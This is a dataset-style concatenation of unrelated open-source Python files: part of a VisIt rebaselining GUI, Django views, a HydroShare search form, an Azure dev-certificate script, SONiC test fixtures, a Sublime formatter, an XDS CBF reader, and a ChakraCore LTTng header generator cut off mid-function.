def _next_set_of_images(self):
"""Figures out the next set of images to display. Downloads 'current' and
'diff' results from davinci. Sets filenames corresponding to baseline,
current and diff images."""
if self._baseline is None: # first call, build list.
self._imagelist = []
print("Building initial file list... please wait.")
self.status("Building initial file list... please wait.")
for root, dirs, files in os.walk("baseline"):
for f in files:
fn, ext = os.path.splitext(f)
if ext == ".png":
# In some cases, we can trivially reject a file. Don't bother
# adding it to our list in that case.
serial_baseline_fn = os.path.join(root, f)
# Does this path contain "parallel" or "scalable_parallel"? Then
# we've got a mode specific baseline. We'll handle those based on
# the serial filenames, so ignore them for now.
if serial_baseline_fn.find("parallel") != -1: continue
baseline_fn, current_fn = baseline_current(serial_baseline_fn)
assert os.path.exists(baseline_fn)
if not trivial_pass(baseline_fn, current_fn):
self._imagelist.append(baseline_fn)
try:
while len(self._imagelist) > 0:
self._baseline = self._imagelist.pop()
# now derive other filenames based on that one.
filename = None
# os.path.split fails if there's no /
try:
filename = os.path.split(self._baseline)
filename = filename[1]
except AttributeError as e:
self.status("No slash!")
break
current_url = uri + "/c_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(current_url, "local_current.png")
else:
f,info = urllib.urlretrieve(current_url, "local_current.png")
self.status("".join(["Checking ", current_url, "..."]))
if info.getheader("Content-Type").startswith("text/html"):
# then it's a 404 or other error; skip this image.
continue
else:
# We found the next image.
self._current = "local_current.png"
diff_url = uri + "/d_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(diff_url, "local_diff.png")
else:
f,info = urllib.urlretrieve(diff_url, "local_diff.png")
if info.getheader("Content-Type").startswith("text/html"):
raise Exception("Could not download diff image.")
self._diff = "local_diff.png"
self.status("Waiting for input on " + filename)
break
except KeyError as e:
print(e)
print("No more images!")
self.emit(QtCore.SIGNAL('closeApp()'))
def _init_signals(self):
self.connect(self, QtCore.SIGNAL('rebaseline()'), self._rebaseline)
self.connect(self, QtCore.SIGNAL('ignore()'), self._ignore)
self.connect(self, QtCore.SIGNAL('unknown()'), self._unknown)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Q:
self.emit(QtCore.SIGNAL('closeApp()'))
if event.key() == QtCore.Qt.Key_Y:
self.emit(QtCore.SIGNAL('rebaseline()'))
if event.key() == QtCore.Qt.Key_N:
self.emit(QtCore.SIGNAL('ignore()'))
if event.key() == QtCore.Qt.Key_U:
self.emit(QtCore.SIGNAL('unknown()'))
QtCore.QCoreApplication.processEvents()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)
results = unittest.TextTestRunner(verbosity=2).run(suite)
if not results.wasSuccessful():
print("Tests failed, bailing.")
sys.exit(1)
app = QtGui.QApplication(sys.argv)
mw = MW()
mw.show()
mw.setWindowTitle("visit rebaseline -p")
layout = Layout(mw)
layout.show()
sys.exit(app.exec_())
|
server/base/views.py | arubdesu/zentral | 634 | 30267 | import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
def get(self, request, *args, **kwargs):
return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
template_name = "base/index.html"
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
app_list = []
for app_name, app_config in apps.app_configs.items():
if getattr(app_config, "events_module", None) is not None:
app_list.append(app_name)
app_list.sort()
context["apps"] = app_list
return context
class AppHistogramDataView(LoginRequiredMixin, View):
INTERVAL_DATE_FORMAT = {
"hour": "%H:%M",
"day": "%d/%m",
"week": "%d/%m",
"month": "%m/%y",
}
def get(self, request, *args, **kwargs):
app = kwargs['app']
try:
zentral_app = apps.app_configs[app]
search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
except (KeyError, AttributeError):
raise Http404
interval = kwargs["interval"]
try:
date_format = self.INTERVAL_DATE_FORMAT[interval]
except KeyError:
raise Http404
labels = []
event_count_data = []
unique_msn_data = []
for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
**search_dict):
labels.append(dt.strftime(date_format))
event_count_data.append(event_count)
unique_msn_data.append(unique_msn)
datasets = {"event_count": {
"label": "{} events".format(app),
"backgroundColor": "rgba(122, 182, 160, 0.7)",
"data": event_count_data
},
"unique_msn": {
"label": "{} machines".format(app),
"backgroundColor": "rgba(225, 100, 86, 0.7)",
"data": unique_msn_data
}}
return JsonResponse({"app": app,
"labels": labels,
"datasets": datasets})
|
hs_core/discovery_form.py | tommac7/hydroshare | 178 | 30280 | from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
SORT_ORDER_CHOICES = (('title', 'Title'),
('author', 'First Author'),
('created', 'Date Created'),
('modified', 'Last Modified'))
SORT_DIRECTION_VALUES = ('', '-')
SORT_DIRECTION_CHOICES = (('', 'Ascending'),
('-', 'Descending'))
NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
sort_order = forms.CharField(label='Sort By:',
widget=forms.Select(choices=SORT_ORDER_CHOICES),
required=False)
sort_direction = forms.CharField(label='Sort Direction:',
widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
required=False)
def search(self):
self.parse_error = None # error return from parser
sqs = self.searchqueryset.all().filter(replaced=False)
if self.cleaned_data.get('q'):
# The prior code corrected for an failed match of complete words, as documented
# in issue #2308. This version instead uses an advanced query syntax in which
# "word" indicates an exact match and the bare word indicates a stemmed match.
cdata = self.cleaned_data.get('q')
try:
parser = ParseSQ()
parsed = parser.parse(cdata)
sqs = sqs.filter(parsed)
except ValueError as e:
sqs = self.searchqueryset.none()
self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
return sqs
except MatchingBracketsNotFoundError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except MalformedDateError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except FieldNotRecognizedError as e:
sqs = self.searchqueryset.none()
self.parse_error = \
("{} Field delimiters include title, contributor, subject, etc. " +
"Please try again.")\
.format(e.value)
return sqs
except InequalityNotAllowedError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
geo_sq = None
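        # Longitude filter for the map bounding box; the else branch below is intended to
        # handle selections that cross the antimeridian (NElng < SWlng) by splitting the
        # accepted range at +/-180 degrees.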
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
# latitude might be specified without longitude
if geo_sq is None:
geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
else:
geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq is not None:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
start_date = self.cleaned_data['start_date']
end_date = self.cleaned_data['end_date']
# allow overlapping ranges
# cs < s < ce OR s < cs => s < ce
# AND
# cs < e < ce OR e > ce => cs < e
if start_date and end_date:
sqs = sqs.filter(SQ(end_date__gte=start_date) &
SQ(start_date__lte=end_date))
elif start_date:
sqs = sqs.filter(SQ(end_date__gte=start_date))
elif end_date:
sqs = sqs.filter(SQ(start_date__lte=end_date))
if self.cleaned_data['coverage_type']:
sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
creator_sq = None
contributor_sq = None
owner_sq = None
subject_sq = None
content_type_sq = None
availability_sq = None
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
value = sqs.query.clean(value)
if value:
if "creator" in field:
if creator_sq is None:
creator_sq = SQ(creator__exact=value)
else:
creator_sq.add(SQ(creator__exact=value), SQ.OR)
if "contributor" in field:
if contributor_sq is None:
contributor_sq = SQ(contributor__exact=value)
else:
contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
elif "owner" in field:
if owner_sq is None:
owner_sq = SQ(owner__exact=value)
else:
owner_sq.add(SQ(owner__exact=value), SQ.OR)
elif "subject" in field:
if subject_sq is None:
subject_sq = SQ(subject__exact=value)
else:
subject_sq.add(SQ(subject__exact=value), SQ.OR)
elif "content_type" in field:
if content_type_sq is None:
content_type_sq = SQ(content_type__exact=value)
else:
content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
elif "availability" in field:
if availability_sq is None:
availability_sq = SQ(availability__exact=value)
else:
availability_sq.add(SQ(availability__exact=value), SQ.OR)
else:
continue
if creator_sq is not None:
sqs = sqs.filter(creator_sq)
if contributor_sq is not None:
sqs = sqs.filter(contributor_sq)
if owner_sq is not None:
sqs = sqs.filter(owner_sq)
if subject_sq is not None:
sqs = sqs.filter(subject_sq)
if content_type_sq is not None:
sqs = sqs.filter(content_type_sq)
if availability_sq is not None:
sqs = sqs.filter(availability_sq)
return sqs
|
scripts/devops_tasks/trust_proxy_cert.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 30287 | <filename>scripts/devops_tasks/trust_proxy_cert.py
import requests
import os
EXISTING_ROOT_PEM = requests.certs.where()
root_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), "..", "..", ".."))
LOCAL_DEV_CERT = os.path.abspath(os.path.join(root_dir, 'eng', 'common', 'testproxy', 'dotnet-devcert.crt'))
COMBINED_FILENAME = os.path.basename(LOCAL_DEV_CERT).split(".")[0] + ".pem"
COMBINED_FOLDER = os.path.join(root_dir, '.certificate')
COMBINED_LOCATION = os.path.join(COMBINED_FOLDER, COMBINED_FILENAME)
def copy_cert_content():
with open(LOCAL_DEV_CERT, 'r') as f:
data = f.read()
if not os.path.exists(COMBINED_FOLDER):
os.mkdir(COMBINED_FOLDER)
with open(COMBINED_LOCATION, 'w') as f:
f.write(data)
def combine_cert_file():
with open(EXISTING_ROOT_PEM, 'r') as f:
content = f.readlines();
with open(COMBINED_LOCATION, 'a') as f:
f.writelines(content)
if __name__ == "__main__":
copy_cert_content()
combine_cert_file()
print("Set the following certificate paths:")
print("\tSSL_CERT_DIR={}".format(os.path.dirname(COMBINED_LOCATION)))
print("\tREQUESTS_CA_BUNDLE={}".format(COMBINED_LOCATION))
if os.getenv('TF_BUILD', False):
print("##vso[task.setvariable variable=SSL_CERT_DIR]{}".format(os.path.dirname(COMBINED_LOCATION)))
print("##vso[task.setvariable variable=REQUESTS_CA_BUNDLE]{}".format(COMBINED_LOCATION))
|
tests/stress/conftest.py | lolyu/sonic-mgmt | 132 | 30303 | import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
|
codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | 676 | 30342 | # @author <NAME>
# @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
def __init__(self, view, syntax=None):
self.platform = sublime.platform()
self.classmap = {}
self.st_version = 2
if sublime.version() == '' or int(sublime.version()) > 3000:
self.st_version = 3
self.file_name = view.file_name()
self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
self.packages_path = sublime.packages_path()
self.syntax_file = view.settings().get('syntax')
self.syntax = syntax or self.get_syntax()
# map of settings names with related class
map_settings_formatter = [
('codeformatter_php_options', PhpFormatter),
('codeformatter_js_options', JsFormatter),
('codeformatter_css_options', CssFormatter),
('codeformatter_html_options', HtmlFormatter),
('codeformatter_python_options', PyFormatter),
('codeformatter_vbscript_options', VbscriptFormatter),
('codeformatter_scss_options', ScssFormatter),
('codeformatter_coldfusion_options', ColdfusionFormatter),
('codeformatter_go_options', GoFormatter),
]
for name, _class in map_settings_formatter:
syntaxes = self.settings.get(name, {}).get('syntaxes')
if not syntaxes or not isinstance(syntaxes, str):
continue
for _formatter in syntaxes.split(','):
self.classmap[_formatter.strip()] = _class
def format(self, text):
formatter = self.classmap[self.syntax](self)
try:
stdout, stderr = formatter.format(text)
except Exception as e:
stdout = ''
stderr = str(e)
return self.clean(stdout), self.clean(stderr)
def exists(self):
return self.syntax in self.classmap
def get_syntax(self):
pattern = re.compile(
r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')
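        # e.g. 'Packages/PHP/PHP.tmLanguage' -> 'php' and
        # 'Packages/JavaScript/JavaScript.sublime-syntax' -> 'javascript' after .lower().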
m = pattern.search(self.syntax_file)
found = ''
if m and len(m.groups()) > 0:
found = m.groups()[0]
return found.lower()
def format_on_save_enabled(self):
if not self.exists():
return False
formatter = self.classmap[self.syntax](self)
return formatter.format_on_save_enabled(self.file_name)
def clean(self, string):
if hasattr(string, 'decode'):
string = string.decode('UTF-8', 'ignore')
return re.sub(r'\r\n|\r', '\n', string)
|
iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | 155 | 30344 | #!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# <NAME>, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
"""A class to read the CBF files used in XDS"""
def __init__(self):
pass
def read_file(self, filename):
"""Read the CBF file"""
import pycbf
self.cbf_handle = pycbf.cbf_handle_struct()
self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
self.cbf_handle.rewind_datablock()
def get_data(self):
"""Get the gain array from the file"""
import numpy
# Select the first datablock and rewind all the categories
self.cbf_handle.select_datablock(0)
self.cbf_handle.select_category(0)
self.cbf_handle.select_column(2)
self.cbf_handle.select_row(0)
# Check the type of the element to ensure it's a binary
# otherwise raise an exception
type = self.cbf_handle.get_typeofvalue()
if type.find('bnry') > -1:
# Read the image data into an array
image_string = self.cbf_handle.get_integerarray_as_string()
image = numpy.fromstring(image_string, numpy.int32)
# Get the array parameters
parameters = self.cbf_handle.get_integerarrayparameters_wdims()
image_size = (parameters[10], parameters[9])
# Resize the image
image.shape = (image_size)
else:
raise TypeError('Can\'t find image')
# Return the image
return image
if __name__ == '__main__':
import sys
import numpy
handle = reader()
handle.read_file(sys.argv[1])
image = handle.get_data()
|
tools/lttng.py | Taritsyn/ChakraCore | 8,664 | 30346 | #-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
lttngDataTypeMapping = {
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const char *",
"win:GUID" :"const int",
"win:AnsiString" :"const char*",
"win:UnicodeString" :"const char*",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const uintptr_t",
"win:Binary" :"const char"
}
ctfDataTypeMapping = {
"win:Int64" :"ctf_integer",
"win:HexInt64" :"ctf_integer_hex",
"win:ULong" :"ctf_integer",
"win:count" :"ctf_sequence",
"win:Struct" :"ctf_sequence",
"win:GUID" :"ctf_sequence",
"win:AnsiString" :"ctf_string",
"win:UnicodeString" :"ctf_string",
"win:Double" :"ctf_float",
"win:Int32" :"ctf_integer",
"win:HexInt32" :"ctf_integer_hex",
"win:Boolean" :"ctf_integer",
"win:UInt64" :"ctf_integer",
"win:UInt32" :"ctf_integer",
"win:UInt16" :"ctf_integer",
"win:HexInt16" :"ctf_integer_hex",
"win:UInt8" :"ctf_integer", #actually a character
"win:Int8" :"ctf_integer", #actually a character
"win:Pointer" :"ctf_integer",
"win:Binary" :"ctf_sequence",
"xs:string" :"ctf_string",
"xs:unsignedLong" :"ctf_integer",
"xs:unsignedInt" :"ctf_integer"
}
palDataTypeMapping ={
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const void",
"win:GUID" :"const GUID",
"win:AnsiString" :"LPCSTR",
"win:UnicodeString" :"PCWSTR",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const void*",
"win:Binary" :"const char"
}
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
total = 0
pointers =0
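    # Example: ["win:UInt64", "win:Int32", "win:Pointer"] yields (12, 1) when estimate
    # is False (pointers are counted separately) and 20 when estimate is True (each
    # pointer is assumed to take 8 bytes).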
for param in paramSequence:
if param in ["win:Int64", "win:UInt64", "win:Double"]:
total += 8
elif param in ["win:ULong", "win:Int32", "win:Boolean",]:
total += 4
elif param == "GUID":
total += 16
elif param in ["win:UInt16"]:
total += 2
elif param in ["win:Uint8", "win:Binary"]:
total += 1
elif param == "win:Pointer":
if estimate:
total += 8
else:
pointers += 1
elif estimate:
if param in ["win:AnsiString", "win:Struct"]:
total += 32
elif param in ["win:UnicodeString"]:
total += 64
else:
raise Exception ("Don't know size of " + param)
if estimate:
return total
return total, pointers
class Template:
def __repr__(self):
return "<Template " + self.name + " />"
def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
self.name = name
self.signature = FunctionSignature()
self.structCounts = structCounts
self.arrayCounts = arrayCounts
for variable in prototypes.paramList:
for dependency in dependencies[variable]:
if not self.signature.getParam(dependency):
self.signature.append(dependency, prototypes.getParam(dependency))
@property
def num_params(self):
return len(self.signature.paramList)
def getParam(self, name):
return self.signature.getParam(name)
@property
def estimatedSize(self):
total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
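        # Example: a template with one win:UInt32 and one win:AnsiString estimates
        # 4 + 32 = 36 bytes; the clamps below keep the reservation within [32, 1024].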
if total < 32:
return 32
elif total > 1024:
return 1024
return total
class FunctionSignature:
def __repr__(self):
return ', '.join(self.paramList)
def __init__(self):
self.LUT = {}
self.paramList = []
def append(self, variable, param):
self.LUT[variable] = param
self.paramList.append(variable)
def getParam(self, variable):
return self.LUT.get(variable)
def getLength(self):
return len(self.paramList)
class FunctionParameter:
def __repr__(self):
return self.name
def __init__(self, winType, name, count, outType, length):
self.winType = winType
self.outType = outType
self.name = name
self.length = length
self.count = "win:null"
if winType == "win:GUID" or count == "win:count":
self.count = "win:count"
ignoredXmlAttributes = frozenset(["map"])
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes
def checkKnownAttributes(nodes, templateName):
for node in nodes:
nodeMap = node.attributes
for attribute in nodeMap.values():
if attribute.name not in knownXmlAttributes:
raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
return [e for e in node.getElementsByTagName(tag) if e.parentNode == node]
def parseTemplateNodes(templateNodes):
templates = {}
for templateNode in templateNodes:
templateName = templateNode.getAttribute('tid')
dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
checkKnownAttributes(dataNodes, templateName)
functionPrototypes = FunctionSignature()
arrayCounts = {}
structCounts = {}
var_Dependencies = {}
for dataNode in dataNodes:
variable = dataNode.getAttribute('name')
wintype = dataNode.getAttribute('inType')
outType = dataNode.getAttribute('outType')
wincount = dataNode.getAttribute('count')
winLength = dataNode.getAttribute('length')
var_dependency = [variable]
if winLength:
if wincount:
raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
if wincount.isdigit() and int(wincount) == 1:
wincount = ''
if wincount:
if wincount.isdigit():
raise Exception("Expect constant count to be length")
elif functionPrototypes.getParam(wincount):
var_dependency.insert(0, wincount)
arrayCounts[variable] = wincount
var_Dependencies[variable] = var_dependency
functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
functionPrototypes.append(variable, functionParameter)
structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
for structNode in structNodes:
structName = structNode.getAttribute('name')
countName = structNode.getAttribute('count')
assert(countName in functionPrototypes.paramList)
#childData = structNode.getElementsByTagName("data")
#names = [x.attributes['name'].value for x in childData]
#types = [x.attributes['inType'].value for x in childData]
structCounts[structName] = countName
var_Dependencies[structName] = [countName, structName]
functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
functionPrototypes.append(structName, functionParameterPointer)
templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
return templates
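# Illustrative only (hypothetical template; the attribute names are the ones read by the code above):
#   <template tid="MyTemplate">
#     <data name="Count" inType="win:UInt32"/>
#     <data name="Name" inType="win:UnicodeString"/>
#   </template>
# Real manifests may carry additional attributes such as outType, count, or length.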
def shouldPackTemplate(template):
return template.num_params > MAX_LTTNG_ARGS or len(template.structCounts) > 0 or len(template.arrayCounts) > 0
def generateArgList(template):
# Construct a TP_ARGS macro call, as defined in another macro, e.g.
#
# TP_ARGS( \
# int, my_integer_arg, \
# char*, my_string_arg \
# )
header = "TP_ARGS( \\\n"
footer = "\\\n)"
args = []
if shouldPackTemplate(template):
args.append(" const unsigned int, length")
args.append(" const char *, __data__")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
mappedType = lttngDataTypeMapping[wintypeName]
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
arg = " " + mappedType
if mappedCount != " ":
arg += mappedCount
elif functionParam.length:
arg += "*"
arg += ", " + functionParam.name
args.append(arg)
return header + ", \\\n".join(args) + footer
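# Illustrative only: for a hypothetical template with a single win:UInt32 parameter named "Count"
# (and assuming "win:null" maps to a single space in the elided part of lttngDataTypeMapping),
# generateArgList would emit roughly:
#   TP_ARGS( \
#       const unsigned int, Count\
#   )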
def generateFieldList(template):
# Construct a TP_FIELDS macro call, e.g.
# TP_FIELDS(
# ctf_string(my_string_field, my_string_arg)
# ctf_integer(int, my_integer_field, my_integer_arg)
# )
header = " " + " TP_FIELDS(\n"
footer = "\n )"
fieldList = []
if shouldPackTemplate(template):
fieldList.append(" ctf_integer(unsigned long, length, length)")
fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
if functionParam.outType:
wintypeName = functionParam.outType
ctf_type = None
field_body = None
varname = functionParam.name
if param in template.structCounts or param in template.arrayCounts:
# This is a struct, treat as a sequence
countVar = template.structCounts.get(param, template.arrayCounts.get(param))
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.prop))
elif functionParam.length:
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
else:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string":
field_body = ", ".join((varname, varname))
elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
field_body = ", ".join((mappedType, varname, varname))
elif ctf_type == "ctf_sequence":
raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
else:
raise Exception("Unhandled ctf intrinsic: " + ctf_type)
# fieldList.append("// " + wintypeName)
fieldList.append(" %s(%s)" % (ctf_type, field_body))
return header + "\n".join(fieldList) + footer
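# Illustrative only: for the same hypothetical single-parameter template, and assuming
# ctfDataTypeMapping maps "win:UInt32" to "ctf_integer", generateFieldList would emit roughly:
#      TP_FIELDS(
#         ctf_integer(unsigned int, Count, Count)
#     )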
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
headerLines = []
headerLines.append("")
headerLines.append("#ifdef __int64")
headerLines.append("#if TARGET_64")
headerLines.append("#undef __int64")
headerLines.append("#else")
headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
headerLines.append("#endif // TARGET_64")
headerLines.append("#endif // __int64")
headerLines.append("#undef TRACEPOINT_PROVIDER")
headerLines.append("#undef TRACEPOINT_INCLUDE")
headerLines.append("")
headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n")
headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
for templateName in templates:
template = templates[templateName]
functionSignature = template.signature
headerLines.append("")
headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
tracepointArgs = generateArgList(template)
headerLines.append(tracepointArgs)
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" " + templateName + ",")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS,")
tracepointFields = generateFieldList(template)
headerLines.append(tracepointFields)
headerLines.append(")")
headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" " + templateName + ",\\")
headerLines.append(" name,\\")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS \\")
headerLines.append(")")
headerLines.append("")
headerLines.append("")
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" emptyTemplate,")
headerLines.append(" TP_ARGS(),")
headerLines.append(" TP_FIELDS()")
